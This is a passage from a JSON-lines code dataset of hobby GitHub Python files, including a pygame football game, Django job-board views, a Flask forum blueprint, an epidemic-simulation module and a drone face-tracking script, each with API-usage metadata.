"attribute"}, {"api_name": "utility.common.Common.checktitle", "line_number": 72, "usage_type": "call"}, {"api_name": "utility.common.Common", "line_number": 72, "usage_type": "name"}, {"api_name": "utility.timeutility.TimeUtility.getuniformdate", "line_number": 73, "usage_type": "call"}, {"api_name": "utility.timeutility.TimeUtility", "line_number": 73, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "attribute"}, {"api_name": "utility.timeutility.TimeUtility.DATE_FORMAT_DEFAULT", "line_number": 74, "usage_type": "attribute"}, {"api_name": "utility.timeutility.TimeUtility", "line_number": 74, "usage_type": "name"}, {"api_name": "configuration.constant.SPIDER_S2_WEBSITE_VIDEO", "line_number": 84, "usage_type": "argument"}, {"api_name": "utility.common.Common.urlenc", "line_number": 92, "usage_type": "call"}, {"api_name": "utility.common.Common", "line_number": 92, "usage_type": "name"}, {"api_name": "log.spiderlog.Logger.getlogging", "line_number": 102, "usage_type": "call"}, {"api_name": "log.spiderlog.Logger", "line_number": 102, "usage_type": "name"}, {"api_name": "utility.common.Common.urlenc", "line_number": 116, "usage_type": "call"}, {"api_name": "utility.common.Common", "line_number": 116, "usage_type": "name"}, {"api_name": "lxml.etree.HTML", "line_number": 119, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 119, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 127, "usage_type": "call"}, {"api_name": "log.spiderlog.Logger.getlogging", "line_number": 138, "usage_type": "call"}, {"api_name": "log.spiderlog.Logger", "line_number": 138, "usage_type": "name"}]} +{"seq_id": "5444225137", "text": "import pygame as p\r\n\r\np.init()\r\n\r\nwin = p.display.set_mode((1200,700))\r\np.display.set_caption('Football!')\r\nicon = p.image.load('ball32.png')\r\np.display.set_icon(icon)\r\n\r\nbackground = p.image.load('field1.jpg')\r\n\r\nballimg = p.image.load('ball64.png')\r\nbx = 568\r\nby = 318\r\nbdx = 0\r\nbdy = 0\r\n\r\np1img = p.image.load('player1.png')\r\np1x = 306\r\np1y = 288\r\np1dx = 0\r\np1dy = 0\r\n\r\np2img = p.image.load('player2.png')\r\np2x = 766\r\np2y = 288\r\np2dx = 0\r\np2dy = 0\r\n\r\n\r\ndef ball(x,y):\r\n win.blit(ballimg, (x,y))\r\n\r\ndef p1(x,y):\r\n win.blit(p1img, (x,y))\r\n\r\ndef p2(x,y):\r\n win.blit(p2img, (x,y))\r\n\r\n\r\nrunning = True\r\nwhile running:\r\n\r\n win.blit(background, (0,0))\r\n\r\n for event in p.event.get():\r\n if event.type == p.QUIT:\r\n running = False\r\n if event.type == p.KEYDOWN:\r\n if event.key == p.K_a: \r\n p1dx = -1\r\n if event.key == p.K_d: \r\n p1dx = 1\r\n if event.key == p.K_w: \r\n p1dy = -1\r\n if event.key == p.K_s: \r\n p1dy = 1\r\n if event.key == p.K_LEFT: \r\n p2dx = -1\r\n if event.key == p.K_RIGHT: \r\n p2dx = 1\r\n if event.key == p.K_UP: \r\n p2dy = -1\r\n if event.key == p.K_DOWN: \r\n p2dy = 1\r\n \r\n if event.type == p.KEYUP:\r\n if event.key == p.K_a or event.key == p.K_d or event.key == p.K_w or event.key == p.K_s:\r\n p1dx = 0\r\n p1dy = 0\r\n if event.key == p.K_LEFT or event.key == p.K_RIGHT or event.key == p.K_UP or event.key == p.K_DOWN:\r\n p2dx = 0\r\n p2dy = 0\r\n \r\n \r\n p1x += p1dx\r\n p1y += p1dy\r\n\r\n p2x += p2dx\r\n p2y += p2dy\r\n\r\n bx += bdx\r\n by += bdy\r\n \r\n\r\n if p1x < 0:\r\n p1x = 0\r\n if p1x > 1072:\r\n p1x = 1072\r\n if p1y < 0:\r\n p1y = 0\r\n if p1y > 572:\r\n p1y = 572\r\n \r\n if p2x < 0:\r\n p2x = 0\r\n if p2x > 1072:\r\n p2x = 1072\r\n if p2y < 0:\r\n p2y = 0\r\n if p2y > 572:\r\n p2y = 572\r\n\r\n if p1x - bx > -128 and p1x - bx < -64 and p1y - by > -127 and p1y - by < 63:\r\n bx = p1x + 128\r\n bdx = 0.5\r\n \r\n if p1x - bx < 64 and p1x - bx > 0 and p1y - by > -127 and p1y - by < 63:\r\n bx = p1x - 64\r\n bdx = -0.5\r\n\r\n if p1y - by > -128 and p1y - by < -64 and p1x - bx > -127 and p1x - bx < 63:\r\n by = p1y + 128\r\n bdy = 0.5\r\n \r\n\r\n if p1y - by < 64 and p1y - by > 0 and p1x - bx > -127 and p1x - bx < 63:\r\n by = p1y - 64\r\n bdy = -0.5\r\n\r\n \r\n if p2x - bx > -128 and p2x - bx < -64 and p2y - by > -127 and p2y - by < 63:\r\n bx = p2x + 128\r\n bdx = 0.5\r\n \r\n if p2x - bx < 64 and p2x - bx > 0 and p2y - by > -127 and p2y - by < 63:\r\n bx = p2x - 64\r\n bdx = -0.5\r\n\r\n if p2y - by > -128 and p2y - by < -64 and p2x - bx > -127 and p2x - bx < 63:\r\n by = p2y + 128\r\n bdy = 0.5\r\n \r\n\r\n if p2y - by < 64 and p2y - by > 0 and p2x - bx > -127 and p2x - bx < 63:\r\n by = p2y - 64\r\n bdy = -0.5\r\n\r\n\r\n if p1x - p2x > -128:\r\n p1dx = 0\r\n p2dx = 0\r\n \r\n\r\n if bx <0:\r\n bx = 0\r\n bdx *= -1\r\n if bx > 1136:\r\n bx = 1136\r\n bdx *= -1\r\n if by < 0:\r\n by = 0\r\n bdy *= -1\r\n if by > 636:\r\n by = 636\r\n bdy *= -1\r\n\r\n\r\n\r\n\r\n ball(bx,by)\r\n p1(p1x,p1y)\r\n p2(p2x,p2y)\r\n\r\n \r\n \r\n p.display.update()", "repo_name": "iitimii/unfinished-football-game", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 3, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 167, "usage_type": "attribute"}]} +{"seq_id": "18975207585", "text": "from typing import List, Dict\nfrom pathlib import Path\nfrom tools.configuration import DatabaseConfig\nfrom tools.db import connectToDB, get_entry_id_or_create_it\nfrom joblib import Parallel, delayed\nfrom tools.logging import error\nfrom os import mkdir\n\n\nclass DerivativeBaseClass:\n name: str\n id: int\n db_config: DatabaseConfig\n derivate_folder_path: Path\n realtive_derivative_folder_path: Path\n file_ending: str = None\n name: str = None\n sample_rate: int = None\n bit_depth: int = None\n description: str = None\n overwrite: bool = False\n\n def __init__(self, config: DatabaseConfig, overwrite=False):\n self.overwrite = overwrite\n for field in [\"name\", \"sample_rate\", \"bit_depth\", \"file_ending\", \"description\"]:\n if getattr(self, field) is None:\n raise ValueError(\n \"Missing Class field {} for DerivativeClass, Please add it to your subclass\".format(\n field\n )\n )\n self.db_config = config\n with connectToDB(config) as db_connection:\n with db_connection.cursor() as db_cursor:\n data = [\n (\"name\", self.name),\n (\"sample_rate\", self.sample_rate),\n (\"bit_depth\", self.bit_depth),\n (\"description\", self.description),\n ]\n self.id = get_entry_id_or_create_it(db_cursor, \"derivative\", data, data)\n db_connection.commit()\n self.derivate_folder_path = (\n config.get_derivatives_files_path().joinpath(str(self.id))\n )\n self.realtive_derivative_folder_path = (\n self.derivate_folder_path.relative_to(config.file_storage_path)\n )\n if self.derivate_folder_path.exists() is False:\n mkdir(self.derivate_folder_path)\n\n def create_derivate(source_file_path: Path, target_file_path: Path) -> None:\n \"\"\"Return derivate filePath if exists or create Derivative\"\"\"\n raise NotImplementedError\n\n def add_derivate_to_dict(self, filepath: Path) -> None:\n\n source_file_path: Path = self.db_config.get_originals_files_path().joinpath(\n filepath.as_posix()\n )\n source_file_name = \"{}\".format(filepath.name)\n if source_file_path.exists() is False:\n error(\"File Not found: {}\".format(source_file_path))\n return (source_file_name, None)\n # Create Ending for wav\n # calculate database files sub folders\n target_file_ending = filepath.with_suffix(\".{}\".format(self.file_ending))\n target_file_path: Path = self.derivate_folder_path.joinpath(target_file_ending)\n realtive_target_file_path = self.realtive_derivative_folder_path.joinpath(\n target_file_ending\n )\n if target_file_path.exists() is False or self.overwrite:\n target_file_path.parent.mkdir(parents=True, exist_ok=True)\n try:\n self.create_derivate(source_file_path, target_file_path)\n except:\n print(\"Could not convert: {}\".format(source_file_path))\n target_file_path = None\n if target_file_path is None or target_file_path.exists() == False:\n print(\"File not found {}\".format(target_file_path))\n return (source_file_name, None)\n else:\n return (source_file_name, realtive_target_file_path)\n\n def get_original_derivate_dict(\n self, filepathes: List[Path], n_jobs=-1\n ) -> Dict[str, Path]:\n\n resultList = Parallel(n_jobs=n_jobs)(\n delayed(self.add_derivate_to_dict)(filepath) for filepath in filepathes\n )\n\n return dict(resultList)\n", "repo_name": "hdogan84/database", "sub_path": "src/derivates/DerivativeBaseClasss.py", "file_name": "DerivativeBaseClasss.py", "file_ext": "py", "file_size_in_byte": 3805, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tools.configuration.DatabaseConfig", "line_number": 13, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 15, "usage_type": "name"}, {"api_name": "tools.configuration.DatabaseConfig", "line_number": 23, "usage_type": "name"}, {"api_name": "tools.db.connectToDB", "line_number": 33, "usage_type": "call"}, {"api_name": "tools.db.get_entry_id_or_create_it", "line_number": 41, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 50, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 52, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 58, "usage_type": "name"}, {"api_name": "tools.logging.error", "line_number": 63, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 86, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 86, "usage_type": "name"}, {"api_name": "joblib.Parallel", "line_number": 89, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 90, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 87, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "25712506202", "text": "from data import forums\nfrom flask import Blueprint, render_template\n\nforum = Blueprint('forum',__name__,url_prefix='/forum')\n\n@forum.route(\"/\")\ndef forumpage(forum_id):\n subforumlist = forums.get_subforums(forum_id)\n forumname = forums.get_forum_name(forum_id)\n return render_template(\"forum.html\", subforumlist=subforumlist, forum_id=forum_id, forumname=forumname)\n", "repo_name": "karhis/Tsohafoorumi", "sub_path": "views/forum.py", "file_name": "forum.py", "file_ext": "py", "file_size_in_byte": 386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 4, "usage_type": "call"}, {"api_name": "data.forums.get_subforums", "line_number": 8, "usage_type": "call"}, {"api_name": "data.forums", "line_number": 8, "usage_type": "name"}, {"api_name": "data.forums.get_forum_name", "line_number": 9, "usage_type": "call"}, {"api_name": "data.forums", "line_number": 9, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "27385089017", "text": "import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n\r\n\r\n\r\ndef plot_line(value_list, item_id, app_id, zone_id):\r\n value_list = value_list[1:-2].split(\",\")\r\n try:\r\n value_list = list(map(lambda x: float(x), value_list))\r\n plt.figure()\r\n plt.plot(list(range(len(value_list))), value_list, color=\"r\")\r\n plt.savefig(f\"./plot/plot_item_{item_id}_app_{app_id}_zone_{zone_id}.png\")\r\n plt.close()\r\n except:\r\n\r\n print(f\"[Info] The item id {item_id}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n os.makedirs(\"./plot\")\r\n except:\r\n pass\r\n data = pd.read_csv(\"part_dataframe.csv\", index_col=None, header=0)\r\n value_list = data.at[0, 'y']\r\n print(data)\r\n print(data.dtypes)\r\n # print(value_list[1:-2].split(\",\"))\r\n data.apply(lambda x: plot_line(value_list=x['y'], item_id=x['item_id'],\r\n app_id=x['app_id'], zone_id=x['zone_id']), axis=1)\r\n", "repo_name": "ZiciuCanJustus/SKLCarAccident", "sub_path": "plot_period.py", "file_name": "plot_period.py", "file_ext": "py", "file_size_in_byte": 981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "19168067068", "text": "from django.shortcuts import render, HttpResponse, redirect\nfrom .models import *\nfrom django.contrib import messages\nimport bcrypt\n\ndef index(request):\n return render(request, 'first_app/index.html')\n\ndef process(request):\n # if a form is posted in we will use the validator method which we call -errors-\n if request.method == 'POST':\n errors = User.objects.validator(request.POST)\n # method is checking if there are any errors\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n # if there are errots this redirects to the user form so they can reenter the correct information\n return redirect(index)\n # if there are no errors, we will continue by hashing the password and entering that information into the DB\n else: \n hash1= bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt())\n user = User(first_name = request.POST['first_name'], last_name = request.POST['last_name'], email = request.POST['email'], password = hash1)\n user.save()\n # information that was posted, we will now put into session\n request.session['id'] = user.id\n request.session['name'] = user.first_name \n messages.success(request, \"Registration was successful\")\n return redirect('/')\n \n\ndef login(request):\n if request.method == 'POST':\n errors = User.objects.login_validation(request.POST)\n # checks if there are any errors while trying to login in\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n # if there are any errors, redirect to main page\n return redirect('/')\n # otherwise we will get the user info by their email\n email = request.POST['email']\n user = User.objects.get(email = email)\n # whatever id is obtained from the user that is logged in, we will put their id within session\n request.session['id'] = User.objects.get(email = email).id\n # we will also get user's name through the email they logged in with\n request.session['first_name'] = User.objects.get(email = email).first_name\n return redirect('/dashboard')\n\ndef dashboard(request):\n if 'id' in request.session:\n context = {\n 'users' : User.objects.get(id = request.session['id']),\n # 'this_user_job' : User.objects.filter(id = request.session['id']).uploads,\n 'jobs' : Job.objects.all()\n }\n # print(context['this_user_job'])\n return render(request, 'first_app/dashboard.html', context)\n else: \n return redirect ('/')\n\ndef add_process(request):\n if request.method == 'POST':\n errors = Job.objects.job_validation(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/add')\n else:\n Job.objects.create(title = request.POST['title'], desc = request.POST['desc'], location = request.POST['location'], user = User.objects.get(id = int(request.session['id'])))\n return redirect('/dashboard')\n\ndef addJob(request):\n return render(request, 'first_app/addjob.html')\n\ndef editprocess(request):\n url= \"/edit/\" + str(request.session['id'])\n if request.method == 'POST':\n if 'id' in request.session:\n errors = User.objects.job_validation(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n return redirect(url)\n else: \n job = Job.objects.get( id = request.session['id'])\n job.title = request.POST['title']\n job.desc = request.POST['desc']\n job.location = request.POST['location']\n job.save()\n messages.success(request, \"Job was updated\")\n return redirect(url)\n \ndef edit(request, id):\n jobs = Job.objects.get(id = id)\n context = {\n 'jobs': jobs\n }\n return render (request, 'first_app/edit.html', context)\n\ndef done(request, id):\n delete_job = Job.objects.get(id = id)\n delete_job.delete()\n return redirect('/dashboard')\n\ndef view(request, id):\n jobs = Job.objects.filter(id = id)\n context = {\n 'jobs': jobs\n }\n return render(request, 'first_app/jobinfo.html', context)\n\ndef logout(request):\n request.session.clear()\n return redirect('/')\n\ndef myJob(request):\n user = User.objects.get(id = request.session['id'])\n jobs = Job.objects.filter(user = id)\n context = {\n 'jobs': jobs\n }\n return redirect('/dashboard')\n\n\n", "repo_name": "ngoalexandra/handy_helper", "sub_path": "main/apps/first_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4751, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 7, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "bcrypt.hashpw", "line_number": 21, "usage_type": "call"}, {"api_name": "bcrypt.gensalt", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 27, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 37, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 59, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 66, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 83, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 90, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 90, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 91, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 103, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 110, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 114, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 122, "usage_type": "call"}]} +{"seq_id": "6023121096", "text": "from typing import Callable, Union\n\nfrom episimmer.read_file import ReadVDConfiguration\nfrom episimmer.vulnerability_detection.base import AgentVD, EventVD\nfrom episimmer.world import World\n\n\nclass VD():\n \"\"\"\n Class for implementing all types of Vulnerability Detection modules.\n\n Args:\n vd_config_obj: ReadVDConfiguration object\n world_obj: World object of simulation\n \"\"\"\n def __init__(self, vd_config_obj: ReadVDConfiguration, world_obj: World):\n self.vd_config_obj: ReadVDConfiguration = vd_config_obj\n self.world_obj: World = world_obj\n\n def get_class(self, name: str) -> Callable:\n \"\"\"\n Returns the class of the vulnerability detection module.\n\n Args:\n name: Name of module given as a string\n\n Returns:\n Class of vulnerability detection module\n \"\"\"\n components = name.split('.')\n\n mod = __import__(components[0])\n for comp in components[1:]:\n mod = getattr(mod, comp)\n return mod\n\n def add_target_name(self) -> str:\n \"\"\"\n Returns the name of python file for given user target.\n\n Returns:\n Name of python file\n \"\"\"\n path = ''\n if self.vd_config_obj.target.lower() == 'agent':\n path = 'agent_vd'\n elif self.vd_config_obj.target.lower() == 'event':\n path = 'event_vd'\n else:\n raise Exception('Input valid target')\n\n return path\n\n def get_algorithm(self) -> Callable:\n \"\"\"\n Returns the class of the vulnerability detection algorithm based on user input in vd_config.txt.\n\n Returns:\n Class of the vulnerability detection algorithm\n \"\"\"\n class_path = 'vulnerability_detection' + '.' + self.add_target_name(\n ) + '.' + self.vd_config_obj.algorithm\n algorithm_class = self.get_class(class_path)\n\n return algorithm_class\n\n def run_vul_detection(self) -> None:\n \"\"\"\n Runs the vulnerability detection algorithm\n \"\"\"\n algorithm_class = self.get_algorithm()\n algo_object = algorithm_class(self.world_obj,\n self.vd_config_obj.parameter_dict)\n algo_object.run_detection()\n self.run_output(algo_object)\n\n def run_output(self, algo_object: Union[AgentVD, EventVD]) -> None:\n \"\"\"\n This function by default prints 10 maximum and 10 minimum scores post detection.\n\n Args:\n algo_object: Object of the vulnerability detection module\n \"\"\"\n if (self.vd_config_obj.output_mode == 'Default'\n or self.vd_config_obj.output_mode == ''):\n algo_object.print_default_output(10)\n\n def run_preprocess(self) -> None:\n \"\"\"\n Functionality to be run pre detection\n \"\"\"\n pass\n\n def run_postprocess(self) -> None:\n \"\"\"\n Functionality to be run post detection\n \"\"\"\n pass\n", "repo_name": "healthbadge/episimmer", "sub_path": "episimmer/vulnerability_detection/vd.py", "file_name": "vd.py", "file_ext": "py", "file_size_in_byte": 2984, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "53", "api": [{"api_name": "episimmer.read_file.ReadVDConfiguration", "line_number": 16, "usage_type": "name"}, {"api_name": "episimmer.world.World", "line_number": 16, "usage_type": "name"}, {"api_name": "episimmer.read_file.ReadVDConfiguration", "line_number": 17, "usage_type": "name"}, {"api_name": "episimmer.world.World", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 77, "usage_type": "name"}, {"api_name": "episimmer.vulnerability_detection.base.AgentVD", "line_number": 77, "usage_type": "name"}, {"api_name": "episimmer.vulnerability_detection.base.EventVD", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "16552792538", "text": "from django import forms\nfrom .models import Comment, SubscribeEmail\nfrom django.core.exceptions import ValidationError\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n exclude = ('create_at', 'post')\n widgets = {\n 'name': forms.TextInput(attrs={'placeholder': 'Name'}),\n 'email': forms.EmailInput(attrs={'placeholder': 'Email'}),\n 'website': forms.URLInput(attrs={'placeholder': 'Your website'}),\n 'message': forms.Textarea(attrs={'placeholder': 'Your message'}),\n }\n\n\nclass EmailSubscribeForm(forms.ModelForm):\n email = forms.EmailField(label='',\n widget=forms.EmailInput(attrs={'class': 'email-input', 'placeholder': 'Your email'}))\n\n class Meta:\n model = SubscribeEmail\n fields = ('email',)\n", "repo_name": "Grayder0152/Cook-Blog", "sub_path": "blog/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 838, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "models.Comment", "line_number": 8, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 11, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 11, "usage_type": "name"}, {"api_name": "django.forms.EmailInput", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.URLInput", "line_number": 13, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 13, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 14, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.EmailInput", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "models.SubscribeEmail", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "70966642409", "text": "from djitellopy import Tello\nimport cv2\nimport numpy as np\n\n\ndef telloInit():\n '''\n Initialize the drone, set velocities to 0, display battery percentage, restart the stream\n :returns initialized Drone object\n '''\n\n # Initialize the drone\n dronik = Tello()\n dronik.connect()\n dronik.for_back_velocity = 0\n dronik.left_right_velocity = 0\n dronik.up_down_velocity = 0\n dronik.yaw_velocity = 0\n dronik.speed = 0\n\n # Get battery values in console\n print(f'Amount of battery left {dronik.get_battery()} %')\n\n # Restart the stream\n dronik.streamoff()\n dronik.streamon()\n\n return dronik\n\n\ndef frameGrabber(dronik, w=360, h=240):\n '''\n Function that grabs a frame from Tello camera and returns it resized.\n :param dronik: instance of Tello object\n :param w: width of output frame\n :param h: heigth of output frame\n :return: resized frame\n '''\n frame = dronik.get_frame_read()\n frame = frame.frame\n frame_resized = cv2.resize(frame, (w, h))\n\n return frame_resized\n\n\ndef faceFinder(frm):\n \"\"\"\n :param frm: frame from drone camera\n :return: frm - the same frame with rectangles on main face detected\n \"\"\"\n faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n imgGray = cv2.cvtColor(frm, cv2.COLOR_BGR2GRAY)\n facesDetected = faceCascade.detectMultiScale(imgGray, 1.2, 4)\n facesCenter = []\n facesArea = []\n\n for (x, y, w, h) in facesDetected:\n cv2.rectangle(frm, (x, y), (x + w, y + h), (0, 128, 0), 3)\n facesCenter.append([x + w // 2, y + h // 2])\n facesArea.append(w * h)\n\n if len(facesArea) != 0:\n i = facesArea.index(max(facesArea))\n return frm, [facesCenter[i], facesArea[i]]\n else:\n return frm, [[0, 0], 0]\n\ndef dataDisplay(img, error_x, error_y, spd_x, spd_y, PID):\n '''Take the positional, speed and pid data and display it on video frame'''\n cv2.putText(img, f'PID SETTINGS: Kp:{PID[0]} Ki: {PID[1]} Kd: {PID[2]} ',\n (30,30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,(0,0,255),2)\n cv2.putText(img, f'X ERROR: {error_x} X SPEED: {spd_x}',\n (30,60), cv2.FONT_HERSHEY_SIMPLEX, 0.7,(0,255,0), 2)\n cv2.putText(img, f'Y ERROR: {error_y} Y SPEED: {spd_y}',\n (30,90), cv2.FONT_HERSHEY_SIMPLEX, 0.7,(0,255,0),2)\n return img\n\n\ndef trackingFace(dronik, result, w, h, PID, pError_x, pError_y, frm):\n '''\n\n :param dronik: instance of Tello Object\n :param info: 0 for face not found\n :param w: width\n 